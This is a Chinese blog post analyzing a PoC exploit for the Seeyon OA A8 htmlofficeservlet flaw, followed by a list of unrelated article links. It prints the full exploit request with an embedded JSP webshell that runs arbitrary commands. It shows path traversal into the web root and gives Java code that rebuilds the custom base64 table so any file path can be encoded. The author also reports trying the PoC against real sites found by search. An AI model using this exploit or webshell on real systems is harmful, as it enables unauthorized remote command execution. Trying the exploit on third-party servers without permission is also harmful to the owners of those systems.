致遠OA A8 poc中的編碼

原創 卓桐 2019-06-28 04:20

從昨天就有這個poc的信息,其實我對web並不關心。今天又被刷屏了,有的說能利用,有的不能,所以看了下。

給出的poc如下:

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1119
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host:xxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

 

搜索了使用這個OA的,找到幾個域名,因爲我也是從新聞裏聽來的,所以細節都不清楚。嘗試使用域名替換後,還真成功了。

結合內容和FILENAME字段,猜測應該是把post的內容保存成文件到服務器。
而返回包中F:\upload\taohongTemp…\ApacheJetspeed\webapps\seeyon\test123456.jsp,猜測這就是保存的文件名,應該是利用路徑穿越,所以…\ApacheJetspeed\webapps\seeyon\test123456.jsp應該就是FILENAME的明文。密文:qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

對比發現qfTd qfTd qfTd 和 …\ …\ …\ 似乎存在某種關係。三個字符變成4個字符,猜測有可能是base64,明文53個字符、密文72個字符,剛好對應上,結合其他幾個字段,猜測6和=的作用類似。

HTTP/1.1 200 
Set-Cookie: JSESSIONID=E8A1A625F5FD3584D920DCABBE28A9B1; Path=/seeyon; HttpOnly
Date: Thu, 27 Jun 2019 10:41:16 GMT
Server: SY8045
Content-Length: 1247

DBSTEP V3.0     386             131             666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLw5wLK3qUKsz7uEzg66
java.io.FileNotFoundException: F:\upload\taohongTemp\..\..\..\ApacheJetspeed\webapps\seeyon\test123456.jsp (ϵͳÕÒ²»µ½Ö¸¶¨µÄ·¾¶¡£)<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

 

接下來進行驗證,隨便寫的代碼,懶得優化了

   public static byte[] test(String test, byte[] arr) {
        String code = "qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6";
        byte[] tmp = code.getBytes();


        byte[] bytes = test.getBytes();
        int y = 0;
        for (int i = 0; i < bytes.length; i+=3, y+=4) {
            byte a1 = bytes[i];
            byte a2 = 0;
            if (i + 1 >= bytes.length) {

            } else {
                a2 = bytes[i+1];
            }
            byte a3 = 0;
            if (i + 2 >= bytes.length) {

            } else {
                a3 = bytes[i + 2];
            }

            int f1 = a1 >> 2 & 0x3f;
            System.out.println(f1);
            arr[f1] = tmp[y];

            if (i + 1 >= bytes.length) {
                int f2 = (a1 << 4) & 0x30;
                System.out.println(f2);
                arr[f2] = tmp[y+1];
                arr[64] = '6';
                return arr;
            }
            int f2 = (a1 << 4) & 0x30 | (a2 >> 4) & 0x0f;
            System.out.println(f2);
            arr[f2] = tmp[y+1];

            if (i + 2 >= bytes.length) {
                int f3 = (a2 << 2) & 0x3c;
                System.out.println(f3);
                arr[f3] = tmp[y+2];
                arr[64] = '6';
                return arr;
            }
            int f3 = (a2 << 2) & 0x3c | (a3 >> 6) & 0x03;
            System.out.println(f3);
            arr[f3] = tmp[y+2];

            int f4 = (a3 & 0x3f);
            System.out.println(f4);
            arr[f4] = tmp[y+3];





        }

        return arr;
    }
    

String s1 = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp";

byte[] arr = new byte[65];
byte[] test = test(s1, arr);
System.out.println(new String(test));

 

得到一個不全的數組。

 

之後想辦法利用這個不全的base64的表去編碼一個路徑

   public static byte[] testBase64(String test, byte[] arr) {
//        String code = "qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6";
//        byte[] tmp = code.getBytes();


        byte[] bytes = test.getBytes();
        int encodeLen = bytes.length;
        byte[] out = new byte[( encodeLen / 3 + (encodeLen % 3 == 0 ? 0 : 1) ) * 4];
        int y = 0;
        for (int i = 0; i < bytes.length; i+=3, y+=4) {
            byte a1 = bytes[i];
            byte a2 = 0;
            if (i + 1 >= bytes.length) {

            } else {
                a2 = bytes[i+1];
            }
            byte a3 = 0;
            if (i + 2 >= bytes.length) {

            } else {
                a3 = bytes[i + 2];
            }

            int f1 = a1 >> 2 & 0x3f;
            out[y] = arr[f1];
//            System.out.println((char) arr[f1]);
            if (out[y] == 0) {
                throw new RuntimeException("index "+f1+" null");
            }

            if (i + 1 >= bytes.length) {
                int f2 = (a1 << 4) & 0x30;
//                System.out.println(f2);
                out[y+1] = arr[f2];
                if (out[y+1] == 0) {
                    throw new RuntimeException();
                }
                out[y+2] = '6';
                out[y+3] = '6';
                return out;
            }
            int f2 = (a1 << 4) & 0x30 | (a2 >> 4) & 0x0f;
//            System.out.println(f2);
            out[y+1] = arr[f2];

            if (out[y+1] == 0) {
                throw new RuntimeException();
            }

            if (i + 2 >= bytes.length) {
                int f3 = (a2 << 2) & 0x3c;
//                System.out.println(f3);
                out[y+2] = arr[f3];

                if (out[y+2] == 0) {
                    throw new RuntimeException();
                }

                out[y+3] = '6';
                return out;
            }
            int f3 = (a2 << 2) & 0x3c | (a3 >> 6) & 0x03;
//            System.out.println(f3);
            out[y+2] = arr[f3];

            if (out[y+2] == 0) {
                throw new RuntimeException();
            }

            int f4 = (a3 & 0x3f);
//            System.out.println(f4);
            out[y+3] = arr[f4];

            if (out[y+3] == 0) {
                throw new RuntimeException();
            }



        }

        return out;
    }

s1 = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123457.jsp";
byte[] tp = testBase64(s1, test);
System.out.println(new String(tp));

 

把6改爲7,剛剛好還在已知的編碼範圍內。得到qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzXT2dEg6

替換包發送

HTTP/1.1 200 
Set-Cookie: JSESSIONID=0184F64259F38CDBBDF8E2232BDB6251; Path=/seeyon; HttpOnly
Date: Thu, 27 Jun 2019 10:57:33 GMT
Server: SY8045
Content-Length: 1247

DBSTEP V3.0     386             131             666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzXT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLw5wLK3qUKsz7uEzg66
java.io.FileNotFoundException: F:\upload\taohongTemp\..\..\..\ApacheJetspeed\webapps\seeyon\test123457.jsp (ϵͳÕÒ²»µ½Ö¸¶¨µÄ·¾¶¡£)<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

 

看到返回包正確解析出來了。確定了我們的猜測,還真就是base64編碼。那麼剩下的65-34=31未知的部分可以通過服務端來驗證了。例如只編碼字符“.”

第一個字符可以確定爲q,後兩位可以確定爲6。那麼枚舉剩下的31個字符,當服務器端返回的字符串中解析出“.”,就可知表索引32爲字符“=”。

 

最終補全base64表。

 

這是個websehll,通過這個接口保存post的內容並路徑穿越到web目錄,例如poc是保存一個jsp。

之後請求該jsp

 

 

至於漏洞代碼我不關心,很久以前學過JavaWeb,但是早就主動忘光了。權當再手寫一遍base64了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

ssm根據pdf模板導出pdf

一、使用word設計pdf模板,並另存爲pdf格式的文件。 二、使用Adobe Acrobat DC工具,打開pdf文件,工具中選擇準備表單並打開 三、在文件中設置域名稱,如下圖 四、下面是正式的操作 pom依賴 <!-- 生成P

LVAmber 2020-07-08 12:00:10

給ASP.NET MVC及WebApi添加路由優先級

這是一個對Asp.Net Mvc的一個很小的功能拓展,小項目可能不太需要這個功能,但有時候項目大了註冊的路由不生效時你應該要想到有可能是因爲路由順序的原因,這時這個路由優先級的功能有可能就會給你帶來便利。 一、爲什麼需要路由優先級

gigizhui 2020-07-08 11:54:27

HTML5入門之常用標籤

html5標準網頁聲明 <!DOCTYPE html> 必要結構 <html > <head> <meta charset="UTF-8"> <title>Title</title> </head> <body>

blackcatkiller 2020-07-08 10:51:12

除了自動化訪問性測試,我還對構建的頁面做的六件事

本文翻譯自《Beyond automatic accessibility testing: 6 things I check on every website I build》。如有翻譯不當之處,請不吝指正。 我剛對客戶端完成一次

风萧萧梦潇 2020-07-08 10:22:22

筆記:jdk 1.8 使用switch報錯:Incompatible types. Found: ‘java.lang.String‘, required: ‘byte, char, short o

今天我在使用idea開發Java的時候發現,jdk1.8使用switch報錯,Incompatible types. Found: 'java.lang.String', required: 'byte, char, short o:

stulln 2020-07-08 08:36:20

簡單實現富文本編輯器

下載地址:http://kindeditor.net/ ssm+angular+bootstarp 一、下載 將下載的文件解壓放在項目中靜態目錄下如: 二、在數據庫中找到相應的字段,進行綁定,再調用editor.htm

stulln 2020-07-08 08:36:20

Flask學習筆記(二)瞭解框架

1.1 瞭解框架: Flask作爲Web框架,它的作用主要是爲了開發Web應用程序。那麼我們首先來了解下Web應用程序。Web應用程序 (World Wide Web)誕生最初的目的,是爲了利用互聯網交流工作文檔。 HTTP請求過

还算小萌新? 2020-07-08 08:28:41

koa應用的部署

koa應用的部署 koa2項目的簡單創建到服務器的部署, 本例使用centos。 創建koa2項目 npm install -g koa-generator npm start 是 npm run start npm stop

这魏先森 2020-07-08 08:25:02

自定義標籤2&簡單標籤

       由於傳統標籤使用三個標籤接口來完成不同的功能,顯得過於繁瑣,不利於標籤技術的推廣,SUN公司爲降低標籤技術的學習難度,在JSP2.0中定義了一個更爲簡單、便於編寫和調用的SimpleTag接口來實現標籤的功能。實現Simpl

祁琼冉 2020-07-08 07:54:27

隨筆——web的深入學習方向

開始階段 學習javaweb 從開始的javaSE->javaEE->框架然後就宕機了。一直坐着沒意思的CRUD。 這時候開始利用反射IO寫點自動生成工具。 然後設計數據庫,一對一關係,多對多關係,數據的類型選擇。研究業務設計。發現其實你

l清水 2020-07-08 07:38:46

Windows 系列都有那些版本?

Windows NT 各發布版本 NT版本 市場名稱 版本 發行日期 RTM Build NT 3.1 Windows NT 3.1 Workstation(僅被命名爲“Windows NT”), Advance

qhd_whm 2020-07-08 07:03:30

JavaWeb-14-SpringMVC的簡介和Helloword

Table of Contents 一:springMVC簡介 1:是Spring實現web模塊的;簡化web開發的 2:傳統的MVC 3:springMVC下的MVC  二:springMVC的HelloWorld 1:普通web模式下

苍杲 2020-07-08 06:54:10

長度擴展攻擊詳解

這幾天在看密碼學的長度擴展攻擊,看了不少文章,感覺都說得不夠清楚,自己弄清楚之後想寫一篇,做一個記錄。 1. 簡介        長度擴展攻擊(length extension attack),是指針對某些允許包含額外信息的加密散列函數

szuaurora 2020-07-08 06:53:55

2017zctf misc300

下載題目後是個zip壓縮包,帶有密碼,本質是zip僞加密,解決方法可以是用壓縮包自帶的修復功能,或者用二進制打開工具修改zip文件頭,或者直接在linux下用binwalk –e 直接解壓 成功解壓後是幾個不熟悉的文件格式,還是用binw

szuaurora 2020-07-08 06:53:53

詳細解說IIS運用程序池以及運用程序池回收

什麼是應用程序池呢?這是微軟的一個全新概念:應用程序池是將一個或多個應用程序鏈接到一個或多個工作進程集合的配置。因爲應用程序池中的應用程序與其他應用程序被工作進程邊界分隔,所以某個應用程序池中的應用程序不會受到其他應用程序池中應用程序所產

TQY2008 2020-07-08 03:00:54